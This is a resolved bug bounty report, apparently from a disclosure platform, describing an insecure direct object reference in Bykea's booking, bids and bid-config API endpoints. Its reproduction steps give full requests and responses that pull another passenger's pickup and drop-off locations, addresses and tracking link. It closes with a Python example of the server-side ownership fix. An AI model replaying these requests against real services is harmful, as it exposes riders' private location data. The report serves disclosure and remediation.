
Broken Access Control (IDOR) in Booking Detail and Bids Could Lead to Sensitive Information Disclosure

Severity: High

Program: Bykea

Reported by back2arie

Vulnerability Details

Technical details and impact analysis

Insecure Direct Object Reference (IDOR)
## Summary

Dear Security Team,

I hope this report finds you well. I would like to report an issue where a malicious user could see other users' booking details, bids information and bids config. The vulnerable URL endpoints are:

```text
1. GET https://api.bykea.net/api/v1/bookings/{{booking_id}}?_id={{user_id2}}&token_id={{access_token2}}
2. GET https://api.bykea.net/api/v2/bids/{{booking_id}}?_id={{user_id2}}&token_id={{access_token2}}
3. GET https://boleelagao.bykea.net/v1/config?lat={{latitude}}&lng={{longitude}}&service_code=23&trip_id={{booking_id}}
```

In this case, the `booking_id` in the request URL is vulnerable to IDOR.

## Steps To Reproduce

1. Create 2 users, `attacker` and `victim`. In this case, the `attacker` is a passenger with username `█████████` and the `victim` is a passenger with username `██████████`.
2. As `victim`, perform authentication to get `user_id` and `access_token`.
3. As `victim`, create a new trip.

   Request:

   ```text
   POST https://api.bykea.net/api/v1/trips/create
   Headers:
   User-Agent: BYKEA/1.0.169 (com.bykea.pk; build:21; iOS 15.8.0) Alamofire/1.0.169
   X-App-Version: 1.0.169
   Body:
   {
     "advertisement_id": "REDACTED",
     "token_id": "{{access_token}}",
     "pickup_info": {
       "lng": 67.883339799999931,
       "lat": 29.5500097,
       "address": "سبی, تحصیل سبی, ضلع سبی, سبی ڈویژن, بلوچستان, 82000, پاکستان"
     },
     "trip": {
       "creator": "iOS",
       "service_code": 23,
       "lng": 67.883339799999931,
       "lat": 29.5500097,
       "customer_bid": 75
     },
     "dropoff_info": {
       "address": "Kurak, تحصیل سبی, ضلع سبی, سبی ڈویژن, بلوچستان, پاکستان",
       "lat": 29.573396420702664,
       "lng": 67.898040153086185
     },
     "_id": "{{user_id}}"
   }
   ```

   Response:

   ```json
   {
     "code": 200,
     "success": true,
     "message": "Trip creation successful",
     "data": {
       "trip_id": "███████",
       "trip_no": "PKX████████",
       "passenger_id": "██████████",
       "dt": "2024-02-15T13:49:44.841Z",
       "link": "https://track.bykea.net/PKX██████",
       "nc": true
     }
   }
   ```

   We successfully created a new trip/booking with id `██████`.

4. Now as `attacker`, perform authentication to get `user_id2` and `access_token2`.
5. As `attacker`, perform a request to the booking detail API endpoint.

   Request:

   ```text
   GET https://api.bykea.net/api/v1/bookings/███?_id={{user_id2}}&token_id={{access_token2}}
   Headers:
   User-Agent: BYKEA/1.0.169 (com.bykea.pk; build:21; iOS 15.8.0) Alamofire/1.0.169
   X-App-Version: 1.0.169
   ```

   Response:

   ```json
   {
     "code": 200,
     "success": true,
     "message": "Successfully loaded booking details",
     "data": {
       "_id": "█████",
       "times": { "total_est": 480 },
       "distances": { "total_est": 3241 },
       "fare": { "actual": 75, "upper": 80, "lower": 66, "pre_actual": 81 },
       "factors": { "areaFactor": 1, "profileFactor": 0.92 },
       "shipper_feedback": false,
       "picker_feedback": false,
       "consignee_feedback": false,
       "parcel_insurance": false,
       "return_trip": false,
       "trip_no": "PKX██████",
       "trip_type": "Sawari",
       "is_deleted": false,
       "is_verified": false,
       "est_fare": "81",
       "est": 75,
       "isDispatcher": false,
       "isDropOffInitial": false,
       "isPromo": false,
       "est_distance": 0,
       "creator_type": "iOS",
       "is_cod": false,
       "received_by_name": "",
       "received_by_phone": "",
       "received_by_cnic": "",
       "decision": [],
       "rule_ids": [ "███", "█████████" ],
       "cart_items": [],
       "customer_insurance": false,
       "customer_voucher": false,
       "paid_by": "shipper",
       "passenger_id": "████████",
       "trip_status_code": 23,
       "curLat": "29.5500097",
       "curLng": "67.88333979999993",
       "pickup_lat": "29.5500097",
       "pickup_lng": "67.88333979999993",
       "start_address": "سبی, تحصیل سبی, ضلع سبی, سبی ڈویژن, بلوچستان, 82000, پاکستان",
       "end_lat": "29.573396420702664",
       "end_lng": "67.89804015308619",
       "end_address": "Kurak, تحصیل سبی, ضلع سبی, سبی ڈویژن, بلوچستان, پاکستان",
       "dropoff_lat": "29.573396420702664",
       "dropoff_lng": "67.89804015308619",
       "dropoff_address": "Kurak, تحصیل سبی, ضلع سبی, سبی ڈویژن, بلوچستان, پاکستان",
       "customer_bid": 75,
       "extra_params": {
         "customer_app_version": "1.0.169",
         "rebooking_count": 0,
         "is_passenger_block": false,
         "searchViaScore": true
       },
       "status": "cancelled",
       "session": "█████",
       "city": "643cb7378675551df33df5ab",
       "edt": "2024-02-15T13:49:44.841Z",
       "fare_factor": 0.92,
       "order_id": "█████████",
       "created_at": "2024-02-15T08:44:44.997Z",
       "trip_number": 170955617,
       "__v": 0,
       "link": "https://track.bykea.net/PKX███████",
       "rules": {
         "onExpire": "sendToLoadboard",
         "onCancelByPartner": "reopenOnLoadboard",
         "onCancelByCustomer": "cancelOnLoadboard"
       },
       "updated_at": "2024-02-15T08:44:45.054Z",
       "discounted_fare": 81,
       "eligibleForDropoffDiscount": true,
       "insurance_amount": 0,
       "cancel_by": "Customer",
       "cancel_reason": "No Partner is available",
       "cancelled_at": "2024-02-15T08:45:21.657Z"
     }
   }
   ```

   As we can see, we are able to retrieve the booking details of the `victim`.

6. As `attacker`, retrieve bids information of the `victim`.

   Request:

   ```text
   GET https://api.bykea.net/api/v2/bids/████████?_id={{user_id2}}&token_id={{access_token2}}
   Headers:
   User-Agent: BYKEA/1.0.169 (com.bykea.pk; build:21; iOS 15.8.0) Alamofire/1.0.169
   X-App-Version: 1.0.169
   ```

   Response:

   ```json
   {
     "code": 200,
     "success": true,
     "data": {
       "bids": [],
       "dt": 1707988055001,
       "is_discounted": false
     }
   }
   ```

   As we can see, we can retrieve bid information from the booking of the `victim`. In this case, it's empty since I canceled the booking, but in a real-life scenario, it should be filled up with bids from the partner/driver.

7. As `attacker`, retrieve bids config from the booking of the `victim`.

   Request:

   ```text
   GET https://boleelagao.bykea.net/v1/config?lat=29.5500097&lng=67.88333979999993&service_code=23&trip_id=██████
   Headers:
   X-Lb-User-Id: {{user_id2}}
   X-Lb-User-Token: {{access_token2}}
   ```

   Response:

   ```json
   {
     "code": 200,
     "message": "success",
     "data": {
       "bid_values": [ 20, 40, 60, 80, 100, 120, 140, 160, 180, 200 ],
       "durations": [ 3, 3, 3 ],
       "hash": "██████████"
     }
   }
   ```

## Mitigation

The fix is to check, server-side, that the requested booking/trip `id` is owned by the logged-in user, resolving that user from their access token rather than from any id supplied in the request.
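The ownership check described above, written out as an added example (not Bykea's code): an in-memory model of the `/bookings/{id}` and `/bids/{id}` lookups with the reported behaviour beside a hardened version that resolves the caller from the token and ignores the client-supplied `_id`. All ids, tokens and trip data are constructed placeholders.

```python
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed sample data; the ids are placeholders, not real Bykea identifiers.
TOKENS = {"tok-victim": "user-victim", "tok-attacker": "user-attacker"}
TRIPS = {
    "trip-001": {
        "passenger_id": "user-victim",
        "trip_no": "PKX-EXAMPLE",
        "pickup_lat": "29.5500097",
        "pickup_lng": "67.88333979999993",
        "bids": [{"partner_id": "driver-007", "amount": 80}],
    },
}

@dataclass
class Response:
    code: int
    data: Optional[dict] = None

def get_booking_vulnerable(trip_id: str, claimed_user_id: str, token_id: str) -> Response:
    """Reported behaviour: a valid token is enough, so any trip id is readable."""
    if token_id not in TOKENS:
        return Response(401)
    trip = TRIPS.get(trip_id)
    return Response(404) if trip is None else Response(200, trip)

def owned_trip(trip_id: str, token_id: str) -> Tuple[int, Optional[dict]]:
    """Shared check for the booking and bids handlers: identity comes from the
    token, the client-supplied `_id` is ignored, and a trip that is missing or
    owned by someone else both yield 404 so the endpoint leaks no existence oracle."""
    caller = TOKENS.get(token_id)
    if caller is None:
        return 401, None
    trip = TRIPS.get(trip_id)
    if trip is None or trip["passenger_id"] != caller:
        return 404, None
    return 200, trip

def get_booking_fixed(trip_id: str, claimed_user_id: str, token_id: str) -> Response:
    """Hardened /bookings/{id}: `claimed_user_id` mirrors the URL's `_id` but is ignored."""
    code, trip = owned_trip(trip_id, token_id)
    return Response(code, None if trip is None else {k: v for k, v in trip.items() if k != "bids"})

def get_bids_fixed(trip_id: str, claimed_user_id: str, token_id: str) -> Response:
    """Hardened /bids/{id}: same ownership check, returns only the bid list."""
    code, trip = owned_trip(trip_id, token_id)
    return Response(code, None if trip is None else {"bids": trip["bids"]})
```

With the attacker's token, the vulnerable handler returns the victim's trip while the fixed handlers return 404 regardless of what `_id` the request claims.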
## Supporting Material/References

- [[MITRE] CWE-639: Insecure Direct Object Reference (IDOR)](https://cwe.mitre.org/data/definitions/639.html)
- [[PortSwigger] Insecure direct object references (IDOR)](https://portswigger.net/web-security/access-control/idor)

## Impact

1. Attacker could see sensitive information from other users' booking details, such as `pickup location`, `drop-off location`, `phone`, `tracking`, etc.
2. Attacker could see bids information from other users' booking details.
3. Attacker could see bids config from other users' booking details.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Insecure Direct Object Reference (IDOR)